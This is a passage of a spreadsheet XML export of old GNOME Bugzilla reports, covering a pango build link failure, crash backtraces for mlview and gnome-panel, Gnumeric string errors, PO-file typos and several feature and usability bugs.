(cd .libs &amp;&amp; rm -f libpango-1.0.la &amp;&amp; ln -s ../libpango-1.0.la
libpango-1.0.la)
gcc -DHAVE_CONFIG_H -I. -I. -I.. -DPANGO_ENABLE_BACKEND
-DPANGO_ENABLE_ENGINE -DSYSCONFDIR=\/usr/local/etc\
-DLIBDIR=\/usr/local/lib\ -DMODULE_VERSION=\1.0.0\
-DG_DISABLE_DEPRECATED   -I..    -g -O2 -Wall
-I/usr/local/include/glib-2.0 -I/usr/local/lib/glib-2.0/include   -c
querymodules.c
/bin/sh ../libtool --mode=link gcc  -g -O2 -Wall
-I/usr/local/include/glib-2.0 -I/usr/local/lib/glib-2.0/include    -o
pango-querymodules  querymodules.o    -Wl--export-dynamic  -
L/usr/local/lib
-lgobject-2.0 -lgmodule-2.0 -ldl -lglib-2.0
gcc -g -O2 -Wall -I/usr/local/include/glib-2.0
-I/usr/local/lib/glib-2.0/include -o pango-querymodules querymodules.o
-Wl--export-dynamic  -L/usr/local/lib /usr/local/lib/libgobject-2.0.so
/usr/local/lib/libgmodule-2.0.so -ldl /usr/local/lib/libglib-2.0.so
-Wl--rpath -Wl/usr/local/lib -Wl--rpath -Wl/usr/local/lib
querymodules.o: In function `main':
/usr/local/src/pango-1.0.0/pango/querymodules.c:133: undefined reference to
`pango_config_key_get'
/usr/local/src/pango-1.0.0/pango/querymodules.c:142: undefined reference to
`pango_split_file_list'
/usr/local/src/pango-1.0.0/pango/querymodules.c:135: undefined reference to
`pango_get_lib_subdirectory'
collect2: ld returned 1 exit status
make[3]: *** [pango-querymodules] Error 1
make[3]: Leaving directory `/usr/local/src/pango-1.0.0/pango'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/usr/local/src/pango-1.0.0/pango'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/usr/local/src/pango-1.0.0'
make: *** [all-recursive-am] Error 2
APPENDIX:
INSTALLED PACKAGES: (if it's not here then no it's not installed)
glib-2.0.0.tar.gz
gtk+-2.0.0.tar.gz
jpegsrc.v6b.tar.gz
pkgconfig-0.12.0.tar.gz
tiff-v3.5.5.tar.gz
pango-1.0.0.tar.gz
zlib-1.1.3.tar.gz
BASE LINUX FROM SCRATCH:
autoconf-2.53.tar.bz2
automake-1.6.tar.gz
bash-2.05a.tar.gz
bin86-0.16.2.tar.gz
binutils-2.12.tar.gz
bison-1.33.tar.bz2
bzip2-1.0.2.tar.gz
diffutils-2.7.tar.gz
e2fsprogs-1.27.tar.gz
ed-0.2.tar.gz
file-3.37.tar.bz2
fileutils-4.1.tar.gz
findutils-4.1.patch.bz2
findutils-4.1.tar.gz
flex-2.5.4a.tar.gz
gcc-3.0.4.tar.gz
gettext-0.11.tar.gz
glibc-2.2.5.tar.gz
grep-2.4.2.tar.gz
groff-1.17.2.tar.gz
gzip-1.2.4a.tar.gz
kbd-1.06-2.patch.bz2
kbd-1.06.tar.bz2
less-374.tar.gz
lfs-bootscripts-1.6.tar.bz2
libtool-1.4.2.tar.gz
lilo-22.1.tar.bz2
linux-2.4.18.tar.gz
m4-1.4.tar.gz
make-3.79.1.tar.gz
man-1.5j.tar.bz2
man-pages-1.48.tar.bz2
mawk1.3.3.tar.gz
modutils-2.4.14.tar.bz2
ncurses-5.2-20020216.patch.gz
ncurses-5.2-20020216.tar.gz
ncurses-5.2-20020218.patch.gz
ncurses-5.2-20020223.patch.gz
ncurses-5.2-20020309.patch.gz
ncurses-5.2-20020309.tgz
ncurses-5.2.tar.gz
net-tools-1.60.tar.bz2
netkit-base-0.17.tar.gz
patch-2.4.19-pre2.gz
patch-2.5.4.tar.gz
perl-5.6.1.tar.bz2
procinfo-18.tar.gz
procps-2.0.7.tar.bz2
psmisc-20.2.tar.gz
reiserfsprogs-3.x.1b.tar.gz
sed-3.02.tar.gz
sh-utils-2.0.tar.gz
shadow-20001016.tar.bz2
sysklogd-1.4.1.tar.gz
sysvinit-2.84.tar.bz2
sysvinit-2.84.tar.gz
tar-1.13.patch.bz2
tar-1.13.tar.gz
texinfo-4.1.tar.gz
textutils-2.0.tar.gz
util-linux-2.11o.tar.gz
vim-6.0.tar.bz2atk-1.0.0.tar.gz
divx4linux-20011010_4.02.tgz
lame-3.91.tar.gz
libpng-1.2.1.tar.gz
transcode-0.6.0pre4_20020306.tgz
win32-binaries-011002.tgz</t>
  </si>
  <si>
    <t>GIMP-WEB-440576</t>
  </si>
  <si>
    <t>Hungarian != Hrvatski</t>
  </si>
  <si>
    <t>On the http://www.gimp.org/docs/ page 
The Gimp User Manual 
avaible in several languages 
Hungarian link is wrong.
It should be Croatian.</t>
  </si>
  <si>
    <t>tatar</t>
  </si>
  <si>
    <t>MLVIEW-141578</t>
  </si>
  <si>
    <t>Crash with all documents</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: mlview
Severity: major
Version: GNOME2.6.1 unspecified
Gnome-Distributor: Debian
Synopsis: Crash with all documents
Bugzilla-Product: mlview
Bugzilla-Component: General
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.6.1)
Description:
Description of the crash:
Segfault when you try to open a document
Steps to reproduce the crash:
1. open a doc
2. it just crashs
3. 
Expected Results:
opening the doc
How often does this happen?
always
Additional Information:
with gtk2.4/gnome2.6
Debugging Information:
Backtrace was generated from '/usr/bin/mlv'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 1088806432 (LWP 29208)]
0x409f140e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#0  0x409f140e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0x40163f48 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  
#3  0x40b2507b in g_type_class_peek () from
/usr/lib/libgobject-2.0.so.0
#4  0x40b0bfd2 in g_object_thaw_notify () from
/usr/lib/libgobject-2.0.so.0
#5  0x40b22dd7 in g_type_free_instance () from
/usr/lib/libgobject-2.0.so.0
#6  0x40b23447 in g_type_free_instance () from
/usr/lib/libgobject-2.0.so.0
#7  0x40b24bd1 in g_type_class_ref () from /usr/lib/libgobject-2.0.so.0
#8  0x40b24bf7 in g_type_class_ref () from /usr/lib/libgobject-2.0.so.0
#9  0x40b0ca38 in g_object_newv () from /usr/lib/libgobject-2.0.so.0
#10 0x40b0ce0e in g_object_new_valist () from
/usr/lib/libgobject-2.0.so.0
#11 0x40b0c296 in g_object_new () from /usr/lib/libgobject-2.0.so.0
#12 0x40bde518 in mlview_tree_view_new (a_mlview_xml_doc=0x81b5280 
    a_name=0xbffffa18 test.xml a_app_context=0x80afda8)
    at mlview-tree-view.c:1197
#13 0x40be3003 in mlview_editor_load_xml_file (a_this=0x80a9108 
    a_file_path=0xbffffa18 test.xml) at mlview-editor.c:922
#14 0x08049058 in main (argc=2 argv=0xbffff8c4) at main.c:126
Thread 1 (Thread 1088806432 (LWP 29208)):
#0  0x409f140e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x40163f48 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x40b2507b in g_type_class_peek () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#4  0x40b0bfd2 in g_object_thaw_notify () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#5  0x40b22dd7 in g_type_free_instance () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#6  0x40b23447 in g_type_free_instance () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#7  0x40b24bd1 in g_type_class_ref () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x40b24bf7 in g_type_class_ref () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x40b0ca38 in g_object_newv () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x40b0ce0e in g_object_new_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x40b0c296 in g_object_new () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x40bde518 in mlview_tree_view_new (a_mlview_xml_doc=0x81b5280 
    a_name=0xbffffa18 test.xml a_app_context=0x80afda8)
    at mlview-tree-view.c:1197
	tree_view = (MlViewTreeView *) 0x0
	xml_doc = (xmlDoc *) 0x0
#13 0x40be3003 in mlview_editor_load_xml_file (a_this=0x80a9108 
    a_file_path=0xbffffa18 test.xml) at mlview-editor.c:922
	parent_window = (GtkWidget *) 0x0
	new_view = (MlViewIView *) 0x0
	mlview_xml_document = (MlViewXMLDocument *) 0x81b5280
#14 0x08049058 in main (argc=2 argv=0xbffff8c4) at main.c:126
	i = 0
	mlview_editor = (MlViewEditor *) 0x80a9108
	mlview_program = (GnomeProgram *) 0x8051f68
	mlview_application = (GnomeApp *) 0x80afdc0
	args = (gchar **) 0x8053f98
	popt_context = 0x8055498
	popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	show_version = 0
	show_info = 0
	cmd_options_table = {{longName = 0x80491c0 version 
    shortName = 118 'v' argInfo = 0 arg = 0xbffff7fc val = 0 
    descrip = 0x80491e0 Prints The version of gnome-mlview you are
using 
    argDescrip = 0x0} {longName = 0x8049211 about shortName = 97
'a' 
    argInfo = 0 arg = 0xbffff7f8 val = 0 
    descrip = 0x8049220 Prints some information about gnome-mlview 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
#0  0x409f140e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-05-01 12:36 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product mlview.
   Setting to default milestone for this product '---'
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GSTREAMER-654310</t>
  </si>
  <si>
    <t>FAAC VBR encoding support</t>
  </si>
  <si>
    <t>VBR encoding using FAAC is not available in gstreamer whereas libfaac has support for it.</t>
  </si>
  <si>
    <t>mukul_majmudar</t>
  </si>
  <si>
    <t>EVOLUTION-210633</t>
  </si>
  <si>
    <t>some type of refcounting appears broken yet again</t>
  </si>
  <si>
    <t>To dup: 
1) Start latest build.
2) Exit.
3) Start evo again (no killev.)
4) Note that startup takes a long long time as it hangs on the mail icon
in the splash screen. 
If you insert a killev between 2 and 3 product starts up fine.</t>
  </si>
  <si>
    <t>GNOME-PANEL-75072</t>
  </si>
  <si>
    <t>Panel crashes on creating multiple floating panels</t>
  </si>
  <si>
    <t>This bug is similar to bug #75070 only that this is even easier to 
reproduce.
I have a menu panel to start with.
Just keep creating creating multiple floating panels and panel crashes. 
Ofcourse sometimes you may have to create twenty or more floating panels 
before panel crashes.
I dont have any debugging symbols to attach but here is a list of warnings 
generated before panel crashed.
gnome-panel (pid:19517): ** CRITICAL **: file panel-marshal.c: line 193 
(panel_marshal_INT__INT): assertion `return_value != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): ** CRITICAL **: file panel-marshal.c: line 193 
(panel_marshal_INT__INT): assertion `return_value != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): ** CRITICAL **: file panel-marshal.c: line 193 
(panel_marshal_INT__INT): assertion `return_value != NULL' failed
gnome-panel (pid:19517): ** CRITICAL **: file panel-marshal.c: line 193 
(panel_marshal_INT__INT): assertion `return_value != NULL' failed
gnome-panel (pid:19517): ** CRITICAL **: file panel-marshal.c: line 193 
(panel_marshal_INT__INT): assertion `return_value != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): ** CRITICAL **: file panel-marshal.c: line 193 
(panel_marshal_INT__INT): assertion `return_value != NULL' failed
gnome-panel (pid:19517): ** CRITICAL **: file panel-marshal.c: line 193 
(panel_marshal_INT__INT): assertion `return_value != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-WARNING **: invalid cast from 
`FloatingPos' to `PanelWidget'
gnome-panel (pid:19517): GConf-CRITICAL **: file gconf-client.c: line 1706 
(gconf_client_set_string): assertion `val != NULL' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): ** CRITICAL **: file panel-marshal.c: line 193 
(panel_marshal_INT__INT): assertion `return_value != NULL' failed
gnome-panel (pid:19517): GLib-GObject-CRITICAL **: file gobject.c: line 
1309 (g_object_unref): assertion `G_IS_OBJECT (object)' failed
gnome-panel (pid:19517): ** CRITICAL **: file panel-marshal.c: line 193 
(panel_marshal_INT__INT): assertion `return_value != NULL' failed</t>
  </si>
  <si>
    <t>shivaram.upadhyayula</t>
  </si>
  <si>
    <t>GNUMERIC-118907</t>
  </si>
  <si>
    <t>some string errors</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Gnumeric
Severity: trivial
Version: GNOME2.2.2 1.1.20-cvs
os_details: Ximian Inc.
Synopsis: some string errors
Bugzilla-Product: Gnumeric
Bugzilla-Component: Analytics
Description:
I've found some string errors in the decription of the functions. (still
present in todays cvs)
(and one grammatical error)
I'll summarize them below:
------------------------------
the arguments and the corresponding description of the arguments don't
match in
AMORDEGRC:
@FUNCTION=AMORDEGRC\n
@SYNTAX=AMORDEGRC(costpurchase_datefirst_periodsalvageperiodrate[
basis])\n
@DESCRIPTION=AMORDEGRC returns the depreciation for each accounting
period.\n
\n
@settlement is the settlement date of the security. @maturity is the 
maturity date of the security. @basis is the type of day counting
system you 
want to use:\n
-------------------------------
Idem for AMORLINC
@FUNCTION=AMORLINC\n
@SYNTAX=AMORLINC(costpurchase_datefirst_periodsalvageperiodrate[
basis])\n
@DESCRIPTION=AMORLINC returns the depreciation for each accounting
period.\n
\n
@settlement is the settlement date of the security. @maturity is the 
maturity date of the security. @basis is the type of day counting
system you 
want to use:\n
-------------------------------
Idem for DURATION
@FUNCTION=DURATION\n
@SYNTAX=DURATION(settlementmaturitycoupyieldfreq[basis])\n
@DESCRIPTION=DURATION calculates the duration of a security.\n
\n
@settlement is the settlement date of the security. @maturity is the 
maturity date of the security. @issue is the issue date of the
security. 
@rate is the interest rate set to the security. @pr is the price per
$100 
face value of the security. @basis is the type of day counting system
you 
want to use:\n
-------------------------------
Function SYD Example contains wrong argument:
@EXAMPLES=\n
For example say a company purchases a new computer for $5000 which has
a 
salvage value of $200 and a useful life of three years. We would use
the 
following to calculate the second year's depreciation using the SYD
method:\n
=SYD(5000 200 5 2) which returns 1280.00.\n
should be five instead of three:
salvage value of $200 and a useful life of five years. We would use
the 
______________________________________^^^_______________________
-------------------------------
YIELDMAT contains descriptoin of argument @frequency which is not an
argument in this function?
@FUNCTION=YIELDMAT\n
@SYNTAX=YIELDMAT(settlementmaturityissueratepr[basis])\n
@DESCRIPTION=YIELDMAT calculates the annual yield of a security for
which 
the interest is payed at maturity date.\n
\n
@settlement is the settlement date of the security. @maturity is the 
maturity date of the security. @issue is the issue date of the
security. 
@rate is the interest rate set to the security. @pr is the price per
$100 
face value of the security. @basis is the type of day counting system
you 
want to use:\n
\n
  0  US 30/360\n
  1  actual days/actual days\n
  2  actual days/360\n
  3  actual days/365\n
  4  European 30/360\n
\n
* If @frequency is other than 1 2 or 4 YIELDMAT returns #NUM!
error.\n
* If @basis is omitted US 30/360 is applied.\n
* If @basis is not in between 0 and 4 #NUM! error is returned.\n
-------------------------------
RANDUNIFORM
the layout of the description is confusing: * If a &lt;= x &lt; b and 0
otherwise.
@DESCRIPTION=RANDUNIFORM returns a random variate from the uniform
(flat) 
distribution from a to b. The distribution is\n
\n
\tp(x) dx = {1 over (b-a)} dx.\n
\n
* If a &lt;= x &lt; b and 0 otherwise.\n
* If @a &gt; @b RANDUNIFORM returns #NUM! error.\n
better:
    p(x) dx = {1 over (b-a)} dx
    for a &lt;= x &lt; b
    p(x) dx = 0
    otherwise
or something similar
-------------------------------
EOMONTH
The arguments:  start_date and months in description should have a '@'
character in front:
* EOMONTH returns #NUM! if start_date or months are invalid
-------------------------------
Double negation in:
#: src/dialogs/dialog-solver.c:747
msgid 
Sensitivity nor limits report are not meaningful if the program has
integer 
constraints. These reports will thus not be created
should be (remove 'not'):
Sensitivity nor limits report are meaningful if the program has integer
constraints. These reports will thus not be created
or:
Sensitivity and limits report are not meaningful if the program has
integer 
constraints. These reports will thus not be created
----------------------------------------------------
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-08-01 16:58 -------
Reassigning to the default owner of the component jody@gnome.org.
</t>
  </si>
  <si>
    <t>tino.meinen</t>
  </si>
  <si>
    <t>INTLTOOL-72540</t>
  </si>
  <si>
    <t>intltool-update --maintain marks files as containing translations even though the only marked strings are within comments</t>
  </si>
  <si>
    <t>intltool-update --maintain marks files as containing translations
eventhough the only marked strings are within comments</t>
  </si>
  <si>
    <t>GCONF-315212</t>
  </si>
  <si>
    <t>Some errors in the PO file</t>
  </si>
  <si>
    <t>Version details: Gnome HEAD
1.
#: ../gconf/gconf-backend.c:252
# c-format
msgid Backend `%s' failed return a vtable\n
?? It failed to return it? It failed so we should return it? Please clarify.
2.
#: ../gconf/gconf-database.c:1119
# c-format
msgid 
Failed to log addition of listener %s (%s)will not be able to restore this 
listener on gconfd restart resulting in unreliable notification of 
configuration changes.
Missing space after semi-colon before will not be able...
3.
#: ../gconf/gconfd.c:1586
# c-format
msgid Failed to move new save state file into place: %s
All the other similar strings say saved state file.
4.
#: ../gconf/gconftool.c:3504
# c-format
msgid WARNING: failed to install schema `%s' locale `%s': %s\n
...schema `%s'  locale `%s'...
is easier to read.
also:
#: ../gconf/gconftool.c:3522
# c-format
msgid WARNING: failed to uninstall schema `%s' locale `%s': %s\n
from Clytie Vietnamese translator</t>
  </si>
  <si>
    <t>EVOLUTION-271270</t>
  </si>
  <si>
    <t>Attached XML documents are displayed inline instead of as attachments.</t>
  </si>
  <si>
    <t>Description of Problem:
XML attachments are displayed inline instead of as
attachments.
Steps to reproduce the problem:
1. Create xml document from Excel
2. Mail it to yourself
Actual Results:
XML document is displayed inline
Expected Results:
XML document should be an attachment which gives
you the option to open or save.
How often does this happen? 
Always.
Additional Information:</t>
  </si>
  <si>
    <t>joey</t>
  </si>
  <si>
    <t>GLADE-LEGACY-74013</t>
  </si>
  <si>
    <t>frame titles not stored</t>
  </si>
  <si>
    <t>It seems glade2 drops these on the floor -)</t>
  </si>
  <si>
    <t>EVOLUTION-202903</t>
  </si>
  <si>
    <t>finish IMAP create folder functionality</t>
  </si>
  <si>
    <t>Currently you can't create folders that contain other folders on
UW imapd servers because of the stupid way the IMAP protocol
specifies this. But we can work around this by deleting and
recreating the folder if someone tries to create a subfolder of it
and it's empty.</t>
  </si>
  <si>
    <t>peterw</t>
  </si>
